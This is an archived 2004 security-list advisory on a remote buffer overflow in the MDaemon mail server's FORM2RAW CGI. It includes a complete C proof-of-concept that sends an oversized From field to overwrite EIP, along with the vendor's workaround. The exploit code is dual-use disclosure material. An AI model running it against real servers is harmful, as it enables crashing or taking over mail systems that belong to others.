[NT] Remote Buffer Overflow in MDaemon (Raw Message Handler)

• Previous message: SecuriTeam: "[UNIX] Private Message System XSS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 1 Jan 2004 17:58:59 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Remote Buffer Overflow in MDaemon (Raw Message Handler)
------------------------------------------------------------------------

SUMMARY

" <http://shop.mdaemontools.com/mdaemon.php> MDaemon offers a full range
of mail server functionality. MDaemon protects your users from spam and
viruses, provides full security, includes seamless web access to your
email via WorldClient, remote administration, and much more!".

FORM2RAW.exe is a CGI that allows users to send emails using the MDaemon
via a web page. It processes the fields of an HTML form and creates a raw
message file in the raw queue directory of MDaemon mail server. This file
then will be processed and queued for delivery by MDaemon. An attacker can
cause a buffer overflow in MDaemon by issuing a malformed CGI request to
FORM2RAW.exe.

DETAILS

Vulnerable Systems:
 * MDaemon 6.85 and prior to 6.52

According to the Help file "By default, MDaemon 6.52 or higher will not
send emails created by Form2Raw unless the email address passed in the
'from' tag (see below) is a valid account on the MDaemon server. If you
want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI
file".

Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a
raw file that when processed by MDaemon will cause a Stack buffer
overflow. The EIP register will be overwritten when the From field length
is 249 bytes.

The FORM2RAW.exe is accessible on any default installation of WorlClient
Web server (usually listening on port 3000).

Exploit:
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define RET 0x1dff160
#define PORT 3000
void main(int argc, char **argv)
{
     SOCKET s = 0;
     WSADATA wsaData;

    if(argc < 2)
     {
          fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang
Fouladi, " \
"\nUsage: %s <target ip> \n", argv[0]);
     
                  printf("%d",argc);
                       exit(0);
    }

     WSAStartup(MAKEWORD(2,0), &wsaData);

     s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

     if(INVALID_SOCKET != s)
     {
          SOCKADDR_IN anAddr;
          anAddr.sin_family = AF_INET;
          anAddr.sin_port = htons(PORT);
          anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
               
          if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct
sockaddr)))
          {
               static char buffer[500];
                           int i;
                           memset(buffer,0,sizeof(buffer));
                           strcpy(buffer,"get /form2raw.cgi?From=");
                           for(i=0;i<244;i++) {

                                   strcat(buffer,"a");
                           }
                        
                           strcat(buffer,"bbbb"); //Overwrites EIP
                           strcat(buffer,"c"); //One byte left after ESP
:-(
                           
strcat(buffer,"&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");
                           
                           send(s, buffer, strlen(buffer), 0);
                           printf("Exploit Sent.");
                
          }

                  else printf("Error Connecting to The Target.\n");
          closesocket(s);
     }

        WSACleanup();
}

Vendor Response (Patch):

 <mailto:support@helpdesk.altn.com> Robin Edwards Wrote: We have had a
similar vulnerability report with Form2Raw and hope to release a patch
soon. In the meantime it is easy to disable Form2Raw by following the
instructions below:

To disable FORM2RAW open the
\MDaemon\WorldClient\WorldClient.ini file with Notepad and
delete the following two lines:

CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
 
Afterward, restart WorldClient to register the change.

ADDITIONAL INFORMATION

The information has been provided by <mailto:service@hat-squad.com>
Hat-Squad Security Team.

The original advisory can be found at:
<http://hat-squad.com/bugreport/mdaemon-raw.txt>
http://hat-squad.com/bugreport/mdaemon-raw.txt.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Private Message System XSS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]